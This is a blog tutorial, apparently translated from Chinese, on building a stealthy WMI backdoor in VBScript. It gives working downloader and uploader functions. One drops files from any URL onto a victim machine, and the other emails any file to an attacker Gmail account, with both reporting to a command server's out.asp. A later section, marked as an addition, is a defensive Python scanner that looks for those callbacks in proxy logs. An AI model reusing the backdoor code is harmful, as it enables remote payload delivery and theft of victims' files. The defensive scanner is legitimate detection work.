a2uploader: Building the Perfect "3-No" Backdoor with WMI - Downloader and Uploader

Source: 菠萝菠萝格

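Welcome! ScriptKids, welcome to the world of scripts.

It is finally the weekend, so I can spend more time with my family, play some games, and look into the things that interest me.

Today's topic is again two very simple functions: downloading a specified file to the target machine, and retrieving an arbitrary file from the target machine.

Let's go straight to the example code.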

Downloader

Function DownLoadFile
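Set Http=CreateObject("WinHttp.WinHttpRequest.5.1") //To get past the firewall, use InternetExplorer.Application instead
SplitCmd=Split(CmdText,"|") //Split the command parameters; command format: command number|remote URL|local file|timeout
If UBound(SplitCmd)<3 Then //Simple check that the command format is valid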
Http.Open "GET","http://"&CmdServer&"/"&ServerPath&"/out.asp?cmdresult=Command Error!&macaddress="&CmdFile,True
Http.send
Exit Function
End If
Url=SplitCmd(1) //Extract the URL
LocalFile=SplitCmd(2) //Extract the local file path
TimeOut=SplitCmd(3) //Extract the timeout
Http.Open "GET",Url,False
Http.Send
If Http.Status>299 OR Not Http.WaitForResponse(Timeout) Then //If the status code is >299 or the request timed out
Http.Open "GET","http://"&CmdServer&"/"&ServerPath&"/out.asp?cmdresult=File DownLoad Error!&macaddress=""&CmdFile,True
Http.send
Else
fso.CreateTextFile(LocalFile) //Write to the local file
ASO.open:ASO.loadfromfile LocalFile
ASO.position=0
ASO.type=1
ASO.Write Http.ResponseBody
ASO.SaveToFile LocalFile,2
ASO.close
Http.Open "GET","http://"&CmdServer&"/"&ServerPath&"/out.asp?cmdresult=File DownLoad Success!&macaddress="&CmdFile,True
Http.send
End If
End Function

Uploader

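Here the specified file is sent as an e-mail attachment. This is not the best approach, but it also serves as an introduction to sending e-mail from VBS (with SSL support).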

Function SendFile
GetFileName=Mid(Trim(CmdText),9,Len(Trim(CmdText))-8)   //Another, cruder way of splitting the command parameters; command format: getfile|absolute file path
Set Email = CreateObject("CDO.Message") //Create the CDO.Message object
NameSpace = "http://schemas.microsoft.com/cdo/configuration/" //Set the namespace
Email.From = "[email protected]" //Sender mailbox
Email.To = "[email protected]" //Recipient mailbox
Email.Subject = "File That You Want-"&CmdFile&"-"&GetFileName //Mail subject
Email.Textbody = "File That You Want" //Mail body
Email.AddAttachment GetFileName,true //Attach the specified file
With Email.Configuration.Fields //Set the mail sending parameters
.Item(NameSpace&"sendusing") = 2 //cdoSendUsingPort
.Item(NameSpace&"smtpserver") = "smtp.gmail.com" //SMTP server
.Item(NameSpace&"smtpserverport") = 465 //SMTP port; Gmail uses 465
.Item(NameSpace&"smtpusessl") = true //Gmail uses SSL
.Item(NameSpace&"smtpauthenticate") = 1 //Authentication method: basic
.Item(NameSpace&"sendusername") = "[email protected]" //SMTP login user name
.Item(NameSpace&"sendpassword") = "lalalalalaooolll" //Password; don't bother trying it, it is definitely wrong ^0^
.Update //Update the configuration
End With
Email.Send
Http.Open "GET","http://"&CmdServer&"/"&ServerPath&"/out.asp?cmdresult=File Has Been Sended!&macaddress="&CmdFile,true //Hey! It has been sent, go check your mail
Http.send
End Function
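
For defenders: both functions report their status with the same URL shape, a GET to out.asp carrying cmdresult and macaddress query parameters. The Python sketch below is an added example, not part of the original post; it scans proxy log lines for that shape. The "client method url" log layout, the field names in the result and every sample line are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Status strings that the two functions on this page send back in cmdresult.
KNOWN_RESULTS = {
    "Command Error!",
    "File DownLoad Error!",
    "File DownLoad Success!",
    "File Has Been Sended!",
}

# Constructed proxy log lines in an assumed "client method url" layout.
SAMPLE_LOG = """\
10.0.0.5 GET http://203.0.113.10/srv/out.asp?cmdresult=File%20DownLoad%20Success!&macaddress=00-11-22-33-44-55
10.0.0.5 GET http://203.0.113.10/srv/out.asp?cmdresult=Command%20Error!&macaddress=00-11-22-33-44-55
10.0.0.6 GET http://203.0.113.10/srv/OUT.ASP?CmdResult=other%20text&MacAddress=00-11-22-33-44-66
10.0.0.7 GET http://intranet.example/report/out.asp?id=42
10.0.0.9 GET http://198.51.100.4/a/out.asp?cmdresult=File Has Been Sended!&macaddress=AA-BB-CC-DD-EE-FF
"""


def find_callbacks(log_text):
    """Return one dict per request that matches the out.asp callback shape."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(None, 2)  # the URL may contain unencoded spaces
        if len(parts) != 3:
            continue
        client, _method, url = parts
        u = urlsplit(url)
        if not u.path.lower().endswith("/out.asp"):
            continue
        # Parameter names are compared case-insensitively.
        query = {k.lower(): v[0] for k, v in
                 parse_qs(u.query, keep_blank_values=True).items()}
        if "cmdresult" not in query or "macaddress" not in query:
            continue
        hits.append({
            "client": client,
            "server": u.hostname,
            "host_id": query["macaddress"],
            "result": query["cmdresult"],
            "known_string": query["cmdresult"] in KNOWN_RESULTS,
        })
    return hits


if __name__ == "__main__":
    for hit in find_callbacks(SAMPLE_LOG):
        print(hit)
```

A hit with known_string set to False still matches the parameter pair and deserves review, since the status text is trivial to change while the page name and parameter names are what the server side expects.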
